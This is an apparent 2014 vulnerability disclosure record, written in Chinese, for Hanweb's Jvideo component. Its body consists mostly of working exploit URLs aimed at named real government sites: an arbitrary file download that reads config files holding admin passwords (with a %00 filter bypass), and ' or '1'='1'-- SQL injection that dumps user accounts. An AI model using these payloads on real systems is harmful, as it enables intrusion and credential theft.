大汉Jvideo两处漏洞小合集（可能导致管理后台权限劫持）

基本字段

漏洞编号：: SSV-93856

披露/发现时间：: 2014-05-12

提交时间：: 2014-05-12

漏洞等级：

漏洞类别：: 其他类型

影响组件：: JCMS(Hanweb)

漏洞作者：: wefgod

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2014-060416

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述：两处。 ### 详细说明：一个是任意文件下载，一个是sql注入。先看任意文件下载吧，任意文件下载可以下载到setup的相关安装信息，从而可以登录setup目录的管理后台 http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/web.xml [<img src="https://images.seebug.org/upload/201405/1212340476c3a25a844a21de7d94ba631e4726e1.png" alt="image001.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1212340476c3a25a844a21de7d94ba631e4726e1.png) 来点好东西 http://222.66.10.88:8081/jvideo/down.jsp?pathfile=WEB-INF/ini/merpserver.ini [<img src="https://images.seebug.org/upload/201405/12123526289f086b8d632fd3a3f1c90ce251ef0d.png" alt="image002.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123526289f086b8d632fd3a3f1c90ce251ef0d.png) 可以看见setup下Admin的密码（屏蔽了），登录成功 [<img src="https://images.seebug.org/upload/201405/121235439d15b3f504da28ef7f026f02a0c9e78c.png" alt="image003.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/121235439d15b3f504da28ef7f026f02a0c9e78c.png) 另外一个网站 http://www.yzwh.gov.cn/jvideo/down.jsp?pathfile=WEB-INF/ini/merpserver.ini [<img src="https://images.seebug.org/upload/201405/12123607c70e6e9df77ef28c39b823af711a82b8.png" alt="image005.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123607c70e6e9df77ef28c39b823af711a82b8.png) 也可以看见setup下的admin的密码，登录成功 [<img src="https://images.seebug.org/upload/201405/12123630e2de9dd86639d54808d90bff0e321b69.png" alt="image006.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123630e2de9dd86639d54808d90bff0e321b69.png) 如果遇到某些下载下来是空白的情况，可以试试下面这样： pathfile=/WEB-INF/ini/merpserver.ini%00.flv 可以绕过他们的防下载。 ### 漏洞证明： SQL就简单证明下了网站1 正常页面： http://www.yzwh.gov.cn/jvideo/objectbox/selectx_userlist.jsp [<img src="https://images.seebug.org/upload/201405/121237187827aee214c29d7412b25151e3c8179e.png" alt="image008.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/121237187827aee214c29d7412b25151e3c8179e.png) 用or测试，回显所有账号信息： http://www.yzwh.gov.cn/jvideo/objectbox/selectx_userlist.jsp?type=&userType=-1&fn_Keywords=%E5%BC%A0%E4%B8%89' or '1'='1'--&perm=&cPage=1&tiao= [<img src="https://images.seebug.org/upload/201405/12123737713362ed0cc4bc511f6fbbf397065ad4.png" alt="image010.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123737713362ed0cc4bc511f6fbbf397065ad4.png) 用and： http://www.yzwh.gov.cn/jvideo/objectbox/selectx_userlist.jsp?type=&userType=-1&fn_Keywords=%E5%BC%A0%E4%B8%89' and '1'='1'--&perm=&cPage=1&tiao= [<img src="https://images.seebug.org/upload/201405/1212375147685fbedbd56c99fb75e9ca81bfb620.png" alt="image012.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1212375147685fbedbd56c99fb75e9ca81bfb620.png) http://www.yzwh.gov.cn/jvideo/objectbox/selectx_userlist.jsp?type=&userType=-1&fn_Keywords=%E5%BC%A0%E4%B8%89'--&perm=&cPage=1&tiao= 可以用注释符： [<img src="https://images.seebug.org/upload/201405/12123806ad15dced49bf9003b7393ba05632e0cb.png" alt="image013.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123806ad15dced49bf9003b7393ba05632e0cb.png) 网站2 正常页面： http://www.jinxiang.gov.cn/jvideo/objectbox/selectx_userlist.jsp [<img src="https://images.seebug.org/upload/201405/12123824440aa0179a20a48d2af7745c8667caa4.png" alt="image015.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123824440aa0179a20a48d2af7745c8667caa4.png) 用and测试，木有问题正常回显搜索的账号： http://www.jinxiang.gov.cn/jvideo/objectbox/selectx_userlist.jsp?type=&userType=-1&fn_Keywords=zzz' and '1'='1'--&perm=&cPage=1&tiao= [<img src="https://images.seebug.org/upload/201405/12123842f580c15d5d11421d76d5b85ec9394e9a.png" alt="image017.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123842f580c15d5d11421d76d5b85ec9394e9a.png) 用or来测试，回显全部账号信息： http://www.jinxiang.gov.cn/jvideo/objectbox/selectx_userlist.jsp?type=&userType=-1&fn_Keywords=zzz' or '1'='1'--&perm=&cPage=1&tiao= [<img src="https://images.seebug.org/upload/201405/12123858cf91b524a5bb23d9929cc6f876e01b96.png" alt="image019.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12123858cf91b524a5bb23d9929cc6f876e01b96.png) 由于网络有问题经常访问网站都是504，所以就不再用工具详细测试了。